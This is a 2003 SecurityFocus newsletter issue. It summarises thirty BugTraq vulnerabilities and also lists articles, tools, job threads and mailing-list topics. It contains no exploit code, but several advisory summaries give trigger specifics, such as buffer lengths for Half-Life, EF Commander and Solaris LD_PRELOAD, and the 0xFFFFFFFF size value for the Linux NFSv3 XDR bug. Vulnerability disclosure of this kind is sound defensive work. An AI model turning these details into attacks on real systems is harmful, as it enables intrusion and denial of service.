SecurityFocus News
Back to list
|
Post reply
SecurityFocus Newsletter #208
Aug 04 2003 07:56PM
John Boletta (jboletta securityfocus com)
SecurityFocus Newsletter #208
-----------------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
------------------------------------------------------------------------
--
I. FRONT AND CENTER
1. Maintaining System Integrity During Forensics
2. Firewall Evolution - Deep Packet Inspection
3. Betting on Malware
II. BUGTRAQ SUMMARY
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
2. Microsoft Outlook Express Script Execution Weakness
3. e107 Website System HTML Injection Vulnerability
4. ManDB Utility Local Buffer Overflow Vulnerability
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
6. University of Minnesota GopherD Do_Command Buffer Overflow...
7. PBLang Bulletin Board System HTML Injection Vulnerability
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service...
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
12. Gallery Search Engine Cross-Site Scripting Vulnerability
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14. MacOS X Third Party Application Screen Effects Password...
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
18. Mini SQL Remote Format String Vulnerability
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
20. KDE Konqueror HTTP REFERER Authentication Credential Leak...
21. Valve Software Half-Life Client Connection Routine Buffer...
22. Valve Software Half-Life Dedicated Server Malformed Parameter...
23. Valve Software Half-Life Dedicated Server Multiplayer Request...
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of...
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service...
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow...
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation...
29. Symantec Quarantine Server Disconnect Denial Of Service...
30. XConq Multiple Environment Variable Buffer Overflow...
III. SECURITYFOCUS NEWS ARTICLES
1. Fed: Cyberterror fears missed real threat
2. Panel Probes the Half-life of Bugs
3. UK e-voting pilots deeply flawed
4. Yaha usurps Klez
IV. SECURITYFOCUS TOP 6 TOOLS
1. PeerProtect v0.2
2. DSPAM v2.6.3
3. pkdump v0.96.2
4. Dante v1.1.14
5. System Rescue CD v0.2.0
6. FSlint v2.0.2
V. SECURITYJOBS LIST SUMMARY
1. Systems Security Engineer (Thread)
2. Looking for a Software Developer or Researcher Position (Thread)
3. Technical Operations Manager vacancy (Thread)
4. Two security positions, one in PA and one in DC (Thread)
5. Network Security Engineer relocating to PA (Thread)
6. Security Engineer position - Montgomery, AL (Thread)
7. Question about opportunities for Americans outside the US (Thread)
8. Installation & Support Technician (Thread)
9. Ethical Hacker Needed -- Chicago (Thread)
10. Security Software Sales opportunity- Federal (Thread)
11. Security Software Sales opportunities- Midwest, Southeast/west...
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
15. IA Program Manger (Thread)
16. Full time IT Auditor position in Pittsburgh PA (Thread)
17. Seeking Information Security Position in the Washington, DC...
18. Seattle - Security Sales (Thread)
19. Google: Network Security Engineer (Thread)
20. Fulltime Test positions -Northern Va (Thread)
21. Symantec's MSS practice looking for security device expert...
22. Senior Security Professional seeking post (Thread)
23. Senior Security Analyst Opportunity - Alphatech Corporation...
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
26. Senior IT Auditor (Thread)
27. System Security Analyst (Thread)
28. IT Security Auditor (Thread)
29. Top Secret Cleared Security Professionals Wanted (Thread)
30. Open Positions at LURHQ Corporation (Thread)
31. Seeking Information Security Position in the SF Bay Area (Thread)
32. Network Security Engineer - Washington, DC (Thread)
33. Axexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
34. Security Software Developer available (Thread)
VI. INCIDENTS LIST SUMMARY
1. Command Line RPC vulnerability scanner? (Thread)
2. Scan of TCP 552-554 (Thread)
3. RPC DCOM exploit (Thread)
4. Scans for 17300/tcp starting again (Thread)
5. Exploit for Windows RPC may be in the wild! (Thread)
6. new worm? or DDoS attack in progress (Thread)
7. Importance of outbound traffic filtering (Thread)
8. floods through our proxy (Thread)
9. Anyone know this tool? (Thread)
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
11. www.google.com reference in directory-traversal attack (Thread)
12. New or old PHP worm? (Thread)
13. Is this enough to identify this by? (Thread)
14. "access_log?hello" ? (Thread)
15. First time security issue. (Thread)
16. [security-elvandar] "access_log?hello" ? (Thread)
17. Heavy port 1214 traffic revisited (Thread)
18. First Time Security Incident (Thread)
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
20. New worm in Japan? (Thread)
21. Port 0 packets (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. Analyze binary for holes (Thread)
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
3. Password Cracking Challenge... (Thread)
4. perl/php connect-back backdoor? (Thread)
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
6. is it even possible for a worm with dcom vuln? (Thread)
7. Some help With BOF Exploits Writing. (Thread)
8. proces on win2K (Thread)
9. Thanks much! (Thread)
10. Unbreakable Lotus Notes (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
1. DCOM RPC exploit as a virus/trojan? (Thread)
2. change NT passwords Kerberos (Thread)
3. How to silently deploy DirectX9b? (Thread)
4. Windows XP "write attributes" permission for Users (Thread)
5. IAS as a RADIUS server (Thread)
6. HTASploit (Thread)
7. ISA Server and Win2k3 standard OS (Thread)
8. SecurityFocus Microsoft Newsletter #147 (Thread)
9. monitor folders (Thread)
10. Tracking down a user in a large AD network (Thread)
IX. SUN FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Betting on Malware
By George Smith
DARPA's plan to create a futures market for terrorist activities is dead, but the
concept is a natural for predicting viruses and worms.
http://www.securityfocus.com/columnists/176
2. Maintaining System Integrity During Forensics
By Jamie Morris
This article discusses best practices for maintaining system integrity
during forensic examinations.
http://www.securityfocus.com/infocus/1717
3. Firewall Evolution - Deep Packet Inspection
By Ido Dubrawsky
Deep Packet Inspection can be seen as the integration of Intrusion
Detection (IDS) and Intrusion Prevention (IPS) capabilities with
traditional stateful firewall technology.
http://www.securityfocus.com/infocus/1716
II. BUGTRAQ SUMMARY
-------------------
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
BugTraq ID: 8280
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8280
Summary:
Novell iChain Server is a web-based security product designed to implement
and maintain various network-based access controls.
Novell iChain has been reported prone to multiple buffer overflow
vulnerabilities.
The first issue occurs when a special script is run against login. The
issue is likely due to insufficient bounds checking performed on
user-supplied data. It is reported that this issue may be exploited to
trigger a server ABEND condition.
The second issue occurs when a user login name >= 230 bytes is passed to
the iChain server. It has been reported that if this login fails and email
alerts is enabled in the iChain server, the excessive data will likely
trigger an ABEND condition in the affected software.
It has been reported that both of these conditions may be exploited to
trigger ABEND conditions and deny service to legitimate users.
This BID will be updated as further technical details are disclosed.
2. Microsoft Outlook Express Script Execution Weakness
BugTraq ID: 8281
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8281
Summary:
It has been reported that a weakness may have been re-introduced into
Microsoft Outlook Express. According to the source, the issue described
in Bugtraq ID 3334 had been fixed by Microsoft but appears to have
resurfaced.
The original report (BID 3334) described behavior where script code
included in a message set as type "text/plain" in its content-type header
field would be parsed and executed. A reliable source has indicated that
this condition appears to have returned after being fixed.
This is unsafe behavior as the client should treat all messages of this
type as plain text and not execute any script or render any HTML.
Furthermore, these messages may bypass filters designed to block messages
that contain HTML/script code based on the content-type field.
It should be noted that Symantec has no record of the original issue being
fixed. This record will be updated as more information becomes available.
3. e107 Website System HTML Injection Vulnerability
BugTraq ID: 8279
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8279
Summary:
e107 Website System is a web based content management system implemented
in PHP.
The e107 Website System is prone to an HTML injection vulnerability. This
issue is exposed through the class2.php script. An attacker may exploit
this issue by including hostile HTML and script code in form fields that
support custom tags. This includes areas of the site such as Chatbox and
Forum. This code may be rendered in the web browser of a user who views
these areas of the site. This would occur in the security context of the
site hosting e107.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
4. ManDB Utility Local Buffer Overflow Vulnerability
BugTraq ID: 8278
Remote: No
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8278
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported prone to a local buffer overflow vulnerability.
It has been reported that a local attacker may exploit this issue to
execute arbitrary instructions with elevated privileges. Specifically,
user 'man' privileges.
The issue likely presents itself due to a lack of sufficient bounds
checking performed on user-supplied data. Although unconfirmed, it has
been conjectured that user supplied data copied into an insufficient
reserved memory buffer may overflow the bounds of that buffer and corrupt
saved values that are crucial to program execution flow control.
The attacker may exploit this issue to influence execution flow of the
vulnerable utility and have arbitrary attacker specified instructions
executed inline.
It should be noted that although the mandb utility is installed with
setuid root privileges by default, this issue has been reported to be only
exploitable to attain user 'man' privileges.
Additionally, although this vulnerability has been reported to affect man
version 2.3.19, other version may also be affected.
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
BugTraq ID: 8282
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8282
Summary:
FreeRADIUS is a freely available, open source implementation of the RADIUS
protocol. It is available for the Unix and Linux operating systems.
A problem with FreeRADIUS has been reported when handling CHAP requests.
Because of this, an attacker may be able to gain unauthorized access to a
system using the vulnerable software.
Specific details about the vulnerability are not currently available. It
is known that the problem in CHAP may be exploited to execute code with
the privileges of the FreeRADIUS server. This could give the attacker
access to the system with the privileges of the FreeRADIUS server.
6. University of Minnesota GopherD Do_Command Buffer Overflow Vulnerability
BugTraq ID: 8283
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8283
Summary:
gopherd is the implementation of the Gopher Protocol Daemon by the
University of Minnesota. It is available for the Unix and Linux platforms.
It has been reported that University of Minnesota gopherd is vulnerable to
a remotely exploitable boundary condition error. This may make it possible
for an attacker to gain unauthorized access to a host using the vulnerable
software.
The problem is in the do_command function of the Gopherd.c file. Due to
insufficient bounds checking on the user-supplied data, it is possible for
an attacker to overwrite sensitive process memory. This could result in
the execution of arbitrary instructions with the privileges of the gopher
daemon process.
7. PBLang Bulletin Board System HTML Injection Vulnerability
BugTraq ID: 8284
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8284
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code in posts to the bulletin board.
This is because the script that processes posts does not sufficiently
sanitize user input, allowing attackers to embed HTML and script commands
within the post. This code may be rendered in the web browser of a user
who views these areas of the site. This would occur in the security
context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
BugTraq ID: 8285
Remote: Yes
Date Published: Jul 26 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8285
Summary:
EF Commander is a commercially available FTP client distributed by
EFSoftware. It is available for the Microsoft Windows platform.
A problem with EF Commander could result in the execution of arbitrary
code.
It has been reported that a memory corruption bug exists in EF Commander.
Under some circumstances, when an FTP client connects to a malicious FTP
server it may be possible for the server to exploit a boundary condition
error.
The problem is in the handling of FTP banners in EF Commander. When EF
Commander receives a FTP banner of excessive length, it becomes unstable.
It has been reported that this vulnerability can be reproduced by sending
an FTP banner of 520 or more bytes to a vulnerable client. It is possible
that this vulnerability is an exploitable buffer overflow, and could
result in the execution of attacker-supplied code. Any code executed would
be with the permissions of the EF Commander client user.
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
BugTraq ID: 8286
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8286
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code encapsulated in [IMG] tags of posts
to the bulletin board. This is because the script that processes posts
does not sufficiently sanitize user input, allowing attackers to embed
HTML and script commands within [IMG] tags of the post. This code may be
rendered in the web browser of a user who views these areas of the site.
This would occur in the security context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
It should be noted that although this vulnerability has been reported to
affect PBLang version 4.56, previous versions are also likely affected.
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8290
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8290
Summary:
The Cisco Aironet AP1x00 is a series of wireless access point devices.
Cisco Aironet AP1x00 series devices are prone to a denial of service
vulnerability upon receipt of a malformed HTTP GET request. This issue
exists in the web administrative interface for affected devices. Such a
request will cause the device to reload. It is possible to cause a
prolonged denial of service by repeatedly sending such requests to an
affected device. This could be exploited to deny availability of a WLAN
that depends on the device.
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
BugTraq ID: 8292
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8292
Summary:
Aironet is the Wireless Access Point solution distributed and maintained
by Cisco.
An information leak has been reported in Cisco Aironet Access Points when
the telnet service has been enabled. This may allow a remote attacker to
gain potentially sensitive information.
The problem is in the response of the telnet daemon. Usual implementation
returns a response to a failed authentication attempt that does not
validate the user name. However, when an invalid username is sent to the
Aironet telnet daemon, the daemon responds with a "% Login invalid"
message, allowing the attacker to gather a list of valid user names on the
target device.
12. Gallery Search Engine Cross-Site Scripting Vulnerability
BugTraq ID: 8288
Remote: Yes
Date Published: Jul 27 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8288
Summary:
Gallery is a web-based photo album. It is written in PHP and is available
for Linux and Unix variants as well as Microsoft Windows operating
systems.
Gallery is prone to a cross-site scripting vulnerability. This issue is
present in the search engine (search.php) facility provided by the
software. Input supplied to the search engine via URI parameters is not
sufficiently sanitized of HTML or script code before being echoed back to
users, allowing for cross-site scripting attacks.
An attacker could exploit this issue by constructing a malicious link to
the search engine that contains hostile HTML and script code.
Attacker-supplied code could be rendered in the browser of a user who
follows such a link. This would occur in the security context of the site
hosting the vulnerable software.
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
BugTraq ID: 8287
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8287
Summary:
mod_mylo is a third party module for Apache HTTP server. The module is
designed to log data into a MySQL database in addition to standard
logging.
mod_mylo has been reported prone to remotely exploitable buffer overflow
vulnerability.
The issue presents itself due to insufficient bounds checking performed on
HTTP requests before the HTTP request string is copied into a buffer in
memory. Data excessive to the size of the buffer will corrupt adjacent
memory. Because memory adjacent to this buffer has been reported to store
a saved instruction pointer, it is possible for a remote attacker to
influence program execution flow. Ultimately a remote attacker may exploit
this condition to execute arbitrary instructions in the context of the
Apache HTTP server.
This issue has been reported to affect mod_mylo version 0.2.1 and all
versions prior.
14. MacOS X Third Party Application Screen Effects Password Protection Bypass
Vulnerability
BugTraq ID: 8293
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8293
Summary:
Apple MacOS X has a screen saver, entitled Screen Effects, with a password
feature.
Screen Effects has been reported prone to a vulnerability where third
party applications may allow a user who has physical access to the host,
to kill the Screen Effects process and thereby subvert desktop password
protection.
Under certain circumstances, this may allow an attacker to gain
unauthorized access to a vulnerable host.
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
BugTraq ID: 8291
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8291
Summary:
HP PHNE_27128 is a cumulative patch released by HP to address non-critical
issues in nettl and nettladm.
It has been reported that the PHNE_27128 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could exploited by a non-privileged user to trigger a system
panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
BugTraq ID: 8289
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8289
Summary:
HP PHNE_26413 is a patch released by HP to address non-critical issues in
nettl, netfmt and nettladm.
It has been reported that the PHNE_26413 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could exploited by a non-privileged user to trigger a system
panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
BugTraq ID: 8294
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8294
Summary:
Softshoe is a human resources application.
Softshoe is allegedly prone to cross-site scripting attacks. The issue
exists in the 'parse_file' component and may be exploited by including
HTML and script code as input to the 'TEMPLATE' URI parameter. An
attacker can exploit this issue by creating a malicious link that contains
hostile HTML or script code to a site that is hosting the vulnerable
software. If such a link is visited, the attacker-supplied code may be
rendered in the user's web browser. This would occur in the context of
the site hosting the software.
Exploitation of this issue could allow for theft of cookie-based
authentication credentials or other attacks.
18. Mini SQL Remote Format String Vulnerability
BugTraq ID: 8295
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8295
Summary:
Mini SQL (mSQL) is a relational database management system.
mSQL has been reported prone to a remotely exploitable format string
vulnerability.
Reportedly a remote attacker may send malicious format specifiers to
trigger the issue. This issue is due to erroneous use of a formatting
function, which may allow format specifiers to be supplied by an external
source, in this case a remote user. By passing specially crafted format
specifiers through a session, may corrupt process memory and thereby have
the ability to execute arbitrary code with the privileges of the affected
daemon, which is typically root.
This vulnerability has been reported to affect mSQL version 1.3 and all
prior versions; other versions may also be affected.
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8296
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8296
Summary:
XBlast is a multi-player arcade game available for Windows and various
Linux distributions.
A locally exploitable buffer overflow vulnerability has been reported in
XBlast 2.6.1.
XBlast does not perform adequate bounds checking on input supplied via the
HOME environment variable. Successful exploitation can lead to arbitrary
code execution. XBlast is typically installed setgid games on Linux
systems, making it possible to exploit this issue to gain these
privileges.
20. KDE Konqueror HTTP REFERER Authentication Credential Leak Vulnerability
BugTraq ID: 8297
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8297
Summary:
Konqueror is a freely available, open source web browser distributed and
maintained by the KDE project. It is available for the Unix and Linux
operating systems.
It has been reported that a problem in KDE Konqueror may result in the
leak of authentication credentials through the HTTP REFERER header field.
This could result in an attacker gaining unauthorized access to
authentication information.
When a user visits a site that keeps the authentication credentials in the
URL, the browser will pass the authentication credentials to the site at
the end of the URL through the referrer log. This could result in
unauthorized access to the user account of the referring page site.
21. Valve Software Half-Life Client Connection Routine Buffer Overflow Vulnerability
BugTraq ID: 8299
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8299
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life Client has been reported prone to a remotely exploitable buffer
overflow condition.
The issue presents itself in the client connection routine, used by the
client to negotiate a connection to the Half-Life game server. Due to a
lack of sufficient bounds checking performed on both the parameter and
value of data transmitted from the game server to the client, a malicious
server may execute arbitrary code on an affected client.
It has been reported that a parameter of 516 bytes and a value of 268,
will corrupt data adjacent to an insufficient buffer. This may allow a
remote attacker to corrupt a saved instruction pointer and thereby
influence program execution flow. Ultimately the attacker may trigger the
execution of supplied instructions in the context of the user running the
affected game client.
It should be noted that although this vulnerability has been reported to
affect Half-Life version 1.1.1.0, previous versions are likely affected.
22. Valve Software Half-Life Dedicated Server Malformed Parameter Loop Denial Of
Service Vulnerability
BugTraq ID: 8301
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8301
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a denial of service that may be exploited
by a malicious client. By supplying malformed parameters in a client
packet during a request to join a multiplayer game, it may be possible to
cause a loop within the server program. This would result in a crash of
the vulnerable server.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
23. Valve Software Half-Life Dedicated Server Multiplayer Request Buffer Overflow
Vulnerability
BugTraq ID: 8300
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8300
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a buffer overflow that may be exploited by
a malicious client. By supplying overly long parameters supplied in a
client packet during a request to join a multiplayer game, it may be
possible to corrupt adjacent locations of stack memory with
attacker-supplied data. This could allow for code execution in the
context of the vulnerable server. It should be noted that the type of
data sent may be restricted by the Half-Life protocol, which may make
exploitation more difficult, as certain characters will not be permitted
in the client request.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service
Vulnerability
BugTraq ID: 8298
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8298
Summary:
XDR (External Data Representation) is a protocol governing the platform
independent description and encoding of data, in this particular case it
is used in conjunction with the Linux implementation of NFSv3 (Network
File System), used to share system based resources across a network. NFS
uses XDR to describe the format of its data.
Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone
to a remote denial of service vulnerability.
The issue presents itself in the decode_fh XDR handler routine contained
in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned
mismatch, when processing the size field of an XDR packet.
A malicious attacker may bypass the following signed sanity check
arithmetic (if (size > NFS3_FHSIZE) of the decode_fh XDR handler routine,
by crafting an XDR packet that contains a negative two's compliment
representation of -1, or 0xFFFFFFFF. This value will be passed to a
memcpy() function that uses the unsigned value of 0xFFFFFFFF or (4 GB), as
its size parameter, the massive memcpy operation will trigger a kernel
panic.
It has been reported that the target host may need an accessible exported
directory, if this vulnerability is to be successfully exploited. It
should be noted that other methods to trigger the vulnerability might also
be possible.
This vulnerability has been reported to affect the Linux 2.4 kernel tree.
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service Vulnerability
BugTraq ID: 8302
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8302
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
NetScreen ScreenOS has been reported prone to a vulnerability that may
allow a remote user to trigger a denial of service condition in an
affected appliance.
It has been reported that by modifying system configuration values that
control the TCP window size, an attacker may trigger a denial of service
in a remote appliance, by connecting to the target appliance.
It has been reported that the issue only affects NetScreen appliances that
are configured to use management services. For example HTTP, SSH or
Telnet.
This issue only affects some ScreenOS 4.0.1rx and 4.0.3rx releases.
NetScreen IDP, NetScreen Firewall/VPN products running ScreenOS 3.x and
earlier, 4.0.0, and 4.0.2 are not vulnerable. The vendor has supplied
upgrades for affected versions.
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
BugTraq ID: 8303
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8303
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported to be affected by multiple buffer overflow
vulnerabilities.
These issues present themselves in the ult_src(), add_to_dirlist(),
test_for_include() functions and in the PATH/MANPATH argument handler of
mandb.
The issues are due to insufficient bounds checking performed on
user-supplied data before it is copied into reserved buffers in memory. A
local attacker may supply excessive data in a manner sufficient to trigger
these issues and in doing so corrupt arbitrary memory. It has been
conjectured that an attacker may ultimately exploit this issue to execute
arbitrary instructions, with elevated privileges.
Code execution would occur in the context of the mandb utility, typically
user 'man'.
This BID will be split up into unique BIDs as these issues are analyzed in
further detail.
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability
BugTraq ID: 8305
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8305
Summary:
Sun Solaris runtime linker (ld) is a utility that is harnessed to link
shared objects to executables at runtime. The environment variable
LD_PRELOAD is used to define a library that will be prioritized above
others when seeking shared libraries.
The Sun Solaris ld runtime linker has been reported prone to a buffer
overflow vulnerability. It has been conjectured that the issue presents
itself, due to insufficient bounds checking performed in the routines used
to process the value of LD_PRELOAD. The effected routine is thought to be
called in the case that an unprivleged user specifies an LD_PRELOAD value
when invoking a setuid binary.
It has been reported that a local attacker may craft an LD_PRELOAD value,
consisting of 1200 bytes of data, appended and pre-pended with a forward
slash. The attacker may then invoke a setuid binary that is dynamically
linked, to trigger the condition in the ld linker. Excessive data copied
from the LD_PRELOAD value, may corrupt internal memory and ultimately
result in the execution of arbitrary code with elevated privileges.
It should be noted that this problem affects systems with the following
attributes:
Sparc Solaris 2.6 with patch 107733-10, and without patch 107733-11.
Sparc Solaris 7 with patches 106950-14 through 106950-22, and without patch 106950-
23.
Sparc Solaris 8 with patches 109147-07 through 109147-24, and without patch 109147-
25.
Sparc Solaris 9 without patch 112963-09.
Intel Solaris 2.6 with patch 107734-10, and without patch 107734-11.
Intel Solaris 7 with patches 106951-14 through 106951-22, and without patch 106951-
23.
Intel Solaris 8 with patches 109148-07 through 109148-24, and without patch 109148-
25.
Intel Solaris 9 without patch 113986-05.
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation Vulnerability
BugTraq ID: 8304
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8304
Summary:
The IRIX unified nsd (Name Service Daemon) provides a generic interface to
a number of network lookup services including DNS, NIS and LDAP.
SGI has reported a vulnerability in IRIX that may permit attackers to gain
remote root privileges via the nsd server and modules. The problem is a
heap overflow in the RPC AUTH_UNIX functionality of the nsd service.
By submitting a malicious string to the service which typically handles
RPC AUTH_UNIX requests on UDP ports above 1024, it is possible to corrupt
heap memory to execute attacker-supplied instructions. This problem would
allow an attacker to gain access to the vulnerable system with the
privileges of the nsd service.
29. Symantec Quarantine Server Disconnect Denial Of Service Vulnerability
BugTraq ID: 8306
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8306
Summary:
Symantec Quarantine Server is a component of Symantec and Norton AntiVirus
Corporate Edition. The server can be be configured to listen on a
user-specified port.
Symantec Quarantine Server (qserver.exe) is prone to a denial of service
vulnerability. This can occur when a user disconnects from the service
before sending any data. This can cause CPU usage for the service to
spike to 100%, potentially denying availability of other resources.
The Quarantine Server must be rebooted for normal functionality to resume.
30. XConq Multiple Environment Variable Buffer Overflow Vulnerabilities
BugTraq ID: 8307
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8307
Summary:
xcong is a multiplayer game that is available for a number of Unix/Linux
variants.
Multiple locally exploitable buffer overflows have been reported in xconq.
This is due to insufficient bounds checking of data supplied via the USER
and DISPLAY environment variables. This may permit a local attacker to
corrupt adjacent regions of stack memory with specific values, allowing
execution of arbitrary code in the context of the program, which is
typically installed setgid 'games'.
This issue appears similar to BID 1495. Further analysis of these issues
may determine that the issues are identical, in which case this BID will
be retired and the earlier BID will be updated.
III. SECURITYFOCUS NEWS AND COMMENTARY
------------------------------------------
1. Fed: Cyberterror fears missed real threat
By Kevin Poulsen
A top U.S. cyber security official says the government was looking for
imagined terrorist hackers, while real terrorists were plotting 9-11.
http://www.securityfocus.com/news/6589
2. Panel Probes the Half-life of Bugs
By Kevin Poulsen
Researchers find that software vulnerabilities have a predictable decay
rate, and the Microsoft RPC hole is currently the most prevalent on the
net.
http://www.securityfocus.com/news/6568
3. UK e-voting pilots deeply flawed
By John Leyden, The Register
A leading British academic has warned of the shortcomings of electronic
voting schemes tried at this year's local elections.
